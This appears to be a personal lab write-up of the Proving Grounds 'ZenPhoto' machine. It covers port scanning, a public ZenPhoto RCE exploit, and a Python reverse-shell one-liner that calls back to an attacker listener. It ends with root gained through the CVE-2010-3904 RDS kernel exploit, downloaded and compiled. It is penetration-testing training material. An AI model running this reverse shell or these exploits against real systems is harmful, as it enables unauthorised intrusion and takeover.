fg0x0's notes
  • 👀Introduction
    • 🏴‍☠️About me
  • 👾offensive-security
    • 🐲OSCP
      • 🛡️Active Directory ( OSCP )
    • ⛓️OSEP
    • 🕸️OSWE
    • 🌌PG-Practice
      • 🏴‍☠️Warm UP
        • 🐧ClamAV
        • 🪟Algernon
        • 🪟Helpdesk
      • 🏴‍☠️Get to Work
        • 🪟Hutch
        • 🪟Jacko
        • 🪟Shenzi
        • 🪟Slort
        • 🐧Postfish
        • 🐧Pelican
        • 🐧Quackerjack
        • 🐧Snookums
        • 🐧Sorcerer
        • 🐧Walla
        • 🐧ZenPhoto
        • 🐧Zino
      • 🏴‍☠️Try Harder
        • 🐧Peppo
        • 🐧Sirol
      • 🏴‍☠️Retired Play Machines
  • 🚩Red Team
    • ☢️Active Directory Exploitation
      • ⚔️Domain Enumeration
      • ⚔️Local Privilege Escalation
    • 👿Red Teaming Zero to Hero
    • 👿Red Teaming All The Things
    • 🕸️Web Exploitation
      • ⚔️XSS (Cross-Site Scripting)
      • ⚔️Remote File Inclusion
      • ⚔️HTML smuggling
    • 💀Binary Exploitation
      • ⚔️Buffer Overflow
      • ⚔️Return Oriented Programming ( ROP )
      • ⚔️Binary Security
      • ⚔️Format String Vulnerability
      • ⚔️Registers
    • ☠️Exploit Development
      • ⚔️Macro Shellcode
      • ⚔️Payloads
  • 🏳️Blue Team
    • 🔍Digital Forensics
    • 🔐Cryptography & Math
      • ⚔️OpenSSL
    • ⏪Reverse Engineering
  • 🏴‍☠️ctf
    • 🏇Haruul Zangi
      • 🏴HZ-2018
        • ⚔️Final-Shao Kahn
      • 🏴HZ-2019
        • ⚔️Final-Уртасгасан-Хээээээээээээээээш
        • ⚔️Final-Skywalker-sage-info
        • ⚔️Round-1-Very Secure LDAP
        • ⚔️Round-1-Web Warmup
      • 🏴HZ-2020
        • ⚔️Round-1-websploit1
        • ⚔️Round-1-websploit2
        • ⚔️Round-1-websploit3
      • 🏴HZ-2021
        • ⚔️Final-Screenshot 1,2
        • ⚔️Final-Orb
      • 🏴HZ-2022
        • ⚔️HZ-2022-Final-You Have Been Hacked
        • ⚔️HZ-2022-Final-Breaking News
        • ⚔️HZ-2022-Final-Todo
        • ⚔️HZ-2022-Final-Subway Surfers
        • ⚔️HZ-2022-Round-2-Spike-Boom-!!!
      • 🏴HZ-2023
        • 👻Round-1
        • 👻Round-2
        • 👻Round-3
          • 🦆Ducky Notes
          • 🚋Aylagch
          • 🔻Web Downchecker
          • 🔑Password Manager
      • 🐣HZ-U18-2023
        • 🔍Forensics
        • ☄️Trivia
        • 🕸️Web
        • 🔢Crypto
        • 🌏Misc
      • 🏴HZ-2024
        • Round-1
          • M4th
        • Round-2
          • Enigma
        • Final-Round
          • 💀heavy one ( forensics )
    • 🏴‍☠️Other CTF
      • 🏜️Shambala-2056
        • 🇦🇷Argentina-PWN (pwn1)
        • 🇪🇬Egypt-Forensics (spectre)
      • 🏴‍☠️SICT CTF
        • 🎮null
      • 🌏Asian Cyber Security Challenge
        • 🌏ACSC ( 2023 )
          • 🏴‍☠️Merkle Hellman ( Cryptography )
          • 🏴‍☠️easySSTI ( Web Exploitation )
          • 🏴‍☠️Hardware is not so hard
  • 🧊HackTheBox
    • 🪟Windows Machine
      • 🤕Support
      • ❌Escape
      • ✈️Flight
      • ☢️Active
    • 🐧Linux Machine
    • ☠️Other Platform Machines
      • ⚔️HMV-Alzheimer
      • ⚔️HMV-BaseME
      • ⚔️HMV-doc
    • Web Exploitation
      • 👽Flask SSTI
        • Templated
        • baby interdimensional internet
        • 👽baby todo or not todo
        • Slippy ( Jinja2 )
      • Injection
        • 👽Phonebook ( LDAP Injection )
        • sanitize ( SQL Injection )
        • Weather app ( SQL Injection )
        • Intergalactic Post ( php filter SQLi )
        • C.O.P ( SQL injection + Revshell )
      • 💥Prototype Pollution
        • ☠️baby breaking grad
      • 😵‍💫insecure deserialization
        • 👽baby website rick ( insecure deserialization )
      • XSS
        • 👽Full Stack Conf (Cross-Site Scripting)
        • AbuseHumandb ( XSS Puppeteer )
        • Kryptos Support ( XSS+IDOR )
        • Felonious Forums ( XSS, Cache Poison, Directory Traversal )
      • 👾Symfony
        • 💀baby bonechewercon ( Symfony )
      • 👥XXE
        • 🤙baby WAFfles order
      • Ping submit hiideg
        • Looking Glass ( Ping )
      • RCE
        • LoveTok ( RCE )
        • Neonify ( RCE )
        • Amidst Us ( image+RCE )
        • Letter Despair ( PHP + RCE )
        • Debugger Unchained ( SQLi+RCE )
      • LFI
        • toxic ( LFI )
      • File Upload
        • petpet rcbee ( file upload )
      • URL submit hiideg
        • baby CachedView ( URL submit hiideg )
      • Invoice ilgeedeg
        • Blinker Fluids
      • HTTP2 smuggling
        • PhishTale ( HTTP2 smuggling, Twig N-Day )
    • Forensics
  • 💀Synack Red Team
    • ☠️DC-1 ( kh )
    • ☠️DC-2 ( kh )
    • ☠️DC-3 ( kh )
  • dursamj
Powered by GitBook
On this page
  • Nmap
  • HTTP
  • Exploitation
  • Stable Shell
  • Privilege Escalation
  1. offensive-security
  2. PG-Practice
  3. Get to Work

ZenPhoto

PreviousWallaNextZino

Last updated 1 year ago

Nmap

192.168.59.41 -sS -sV -p-        

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)
23/tcp   open  ipp     CUPS 1.4
80/tcp   open  http    Apache httpd 2.2.14 ((Ubuntu))
3306/tcp open  mysql   MySQL (unauthorized)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP

Given the open ports that we have and the versions running on them, I am going to jump straight into port 80.

The root page for the target machine takes us to a blank page headed 'UNDER CONSTRUCTION'. Ideally, we should break out some directory enumeration and nikto.

feroxbuster and nikto both pick up the directory /test/ and subsequent directories.

The /test/ directory takes us to the following page which as per the bottom right is running on ZenPhoto.

Viewing the page source and scrolling to the bottom reveals the exact version of ZenPhoto that we are running.

Exploitation

A quick Google search for an exploit on this version of ZenPhoto reveals a result for an RCE exploit.

I downloaded the exploit and run it with the following syntax:

php exploit.php <Target-IP> <ZenPhoto-Dir>

Stable Shell

We now have a shell on the target machine and we are running as the user www-data. I found with this shell that when you try changing directories or running scripts it would have unexpected behavior.

I performed a quick check to see if Python was installed using which python. After confirming Python is installed I tried a quick one-liner reverse shell to see if we can get a more stable one.

First I started a netcat listener on my attacking machine:

sudo nc -lvp 443

Run the following command on the target machine:

python -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'

We now have a more stable shell.

Privilege Escalation

I then started Python SimpleHTTPServer on my attacking machine and downloaded some scripts for privilege escalation.

I executed suggester.sh which picked up the following exploit as being 'highly probable'.

[+] [CVE-2010-3904] rds

   Details: http://www.securityfocus.com/archive/1/514379
   Exposure: highly probable
   Tags: debian=6.0{kernel:2.6.(31|32|34|35)-(1|trunk)-amd64},ubuntu=10.10|9.10,fedora=13{kernel:2.6.33.3-85.fc13.i686.PAE},[ ubuntu=10.04{kernel:2.6.32-(21|24)-generic} ]
   Download URL: http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c

I downloaded the file onto the attacking machine using wget then compiled using gcc.

gcc exploit.c -o exploit

After compiling was finished I used chmod to make the exploit executable.

chmod +x exploit

I then executed the exploit and was able to gain a root shell.

👾
🌌
🏴‍☠️
🐧
ZenPhoto 1.4.1.4 - 'ajax_create_folder.php' Remote Code ExecutionExploit Database
Logo
Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege EscalationExploit Database
Logo